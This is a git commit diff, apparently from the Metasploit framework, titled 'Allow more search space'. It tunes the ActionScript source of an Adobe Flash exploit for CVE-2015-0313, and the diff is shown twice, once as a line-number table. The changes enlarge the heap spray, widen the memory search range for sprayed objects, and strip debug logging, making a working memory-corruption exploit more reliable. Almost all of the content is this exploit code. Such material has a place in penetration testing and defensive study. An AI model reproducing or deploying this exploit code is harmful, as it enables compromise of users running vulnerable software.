Allow more search space

jvazquez-r7 · jvazquez-r7 · commit 7fba64ed141e · 2015-06-10T12:26:53.000-05:00
diff --git a/data/exploits/CVE-2015-0313/msf.swf b/data/exploits/CVE-2015-0313/msf.swf
diff --git a/external/source/exploits/CVE-2015-0313/Exploit.as b/external/source/exploits/CVE-2015-0313/Exploit.as
@@ -52,13 +52,10 @@ public class Exploit extends Sprite
 
         ba.length = 0x1000
         ba.shareable = true
-		Logger.log("spray")
         for (var i:uint = 0; i < ov.length; i++) {
             ov[i] = new Vector.<uint>(1014)
             ov[i][0] = 0xdeedbeef
-			ov[i][1] = 0xdeadbeef
         }
-		Logger.log("holes")
         for (i = 0; i < 70000; i += 2) {
 			delete(ov[i])
 		}
@@ -68,7 +65,6 @@ public class Exploit extends Sprite
         worker.setSharedProperty("mc", mc)
         worker.setSharedProperty("ba", ba)
         ApplicationDomain.currentDomain.domainMemory = ba
-		Logger.log('go')
         worker.start()
     }
 
diff --git a/external/source/exploits/CVE-2015-0313/Exploiter.as b/external/source/exploits/CVE-2015-0313/Exploiter.as
@@ -24,7 +24,7 @@ package
         private var payload_address:uint 
         private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
-        private var spray:Vector.<Object> = new Vector.<Object>(15000)
+        private var spray:Vector.<Object> = new Vector.<Object>(90000)
 
         public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
         {
@@ -54,18 +54,18 @@ package
             Logger.log("[*] Exploiter - spray_objects()")
             for (var i:uint = 0; i < spray.length; i++) 
             {
-                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+				spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
                 spray[i][0] = eba.ba
-                spray[i][1] = exploit 
-                spray[i][2] = stack
-                spray[i][3] = payload_space
+				spray[i][1] = exploit 
+				spray[i][2] = stack
+				spray[i][3] = payload_space
             } 
         }
         
         private function search_objects():uint
         {
             Logger.log("[*] Exploiter - search_objects()")
-            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0x8000)
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
             return idx + 1
         }
 
diff --git a/external/source/exploits/CVE-2015-0313/Logger.as b/external/source/exploits/CVE-2015-0313/Logger.as
@@ -3,7 +3,7 @@ package
     import flash.external.ExternalInterface
 
     public class Logger {
-        private static const DEBUG:uint = 1
+        private static const DEBUG:uint = 0
  
         public static function alert(msg:String):void
         {

Original file line number	Diff line number	Diff line change
`@@ -52,13 +52,10 @@ public class Exploit extends Sprite`
`52`	`52`
`53`	`53`	`ba.length = 0x1000`
`54`	`54`	`ba.shareable = true`
`55`		`- Logger.log("spray")`
`56`	`55`	`for (var i:uint = 0; i < ov.length; i++) {`
`57`	`56`	`ov[i] = new Vector.<uint>(1014)`
`58`	`57`	`ov[i][0] = 0xdeedbeef`
`59`		`- ov[i][1] = 0xdeadbeef`
`60`	`58`	`}`
`61`		`- Logger.log("holes")`
`62`	`59`	`for (i = 0; i < 70000; i += 2) {`
`63`	`60`	`delete(ov[i])`
`64`	`61`	`}`
`@@ -68,7 +65,6 @@ public class Exploit extends Sprite`
`68`	`65`	`worker.setSharedProperty("mc", mc)`
`69`	`66`	`worker.setSharedProperty("ba", ba)`
`70`	`67`	`ApplicationDomain.currentDomain.domainMemory = ba`
`71`		`- Logger.log('go')`
`72`	`68`	`worker.start()`
`73`	`69`	`}`
`74`	`70`
Original file line number	Diff line number	Diff line change
`@@ -24,7 +24,7 @@ package`
`24`	`24`	`private var payload_address:uint`
`25`	`25`	`private var stack:Vector.<uint> = new Vector.<uint>(0x6400)`
`26`	`26`	`private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)`
`27`		`- private var spray:Vector.<Object> = new Vector.<Object>(15000)`
	`27`	`+ private var spray:Vector.<Object> = new Vector.<Object>(90000)`
`28`	`28`
`29`	`29`	`public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void`
`30`	`30`	`{`
`@@ -54,18 +54,18 @@ package`
`54`	`54`	`Logger.log("[*] Exploiter - spray_objects()")`
`55`	`55`	`for (var i:uint = 0; i < spray.length; i++)`
`56`	`56`	`{`
`57`		`- spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)`
	`57`	`+ spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)`
`58`	`58`	`spray[i][0] = eba.ba`
`59`		`- spray[i][1] = exploit`
`60`		`- spray[i][2] = stack`
`61`		`- spray[i][3] = payload_space`
	`59`	`+ spray[i][1] = exploit`
	`60`	`+ spray[i][2] = stack`
	`61`	`+ spray[i][3] = payload_space`
`62`	`62`	`}`
`63`	`63`	`}`
`64`	`64`
`65`	`65`	`private function search_objects():uint`
`66`	`66`	`{`
`67`	`67`	`Logger.log("[*] Exploiter - search_objects()")`
`68`		`- var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0x8000)`
	`68`	`+ var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)`
`69`	`69`	`return idx + 1`
`70`	`70`	`}`
`71`	`71`
Original file line number	Diff line number	Diff line change
`@@ -3,7 +3,7 @@ package`
`3`	`3`	`import flash.external.ExternalInterface`
`4`	`4`
`5`	`5`	`public class Logger {`
`6`		`- private static const DEBUG:uint = 1`
	`6`	`+ private static const DEBUG:uint = 0`
`7`	`7`
`8`	`8`	`public static function alert(msg:String):void`
`9`	`9`	`{`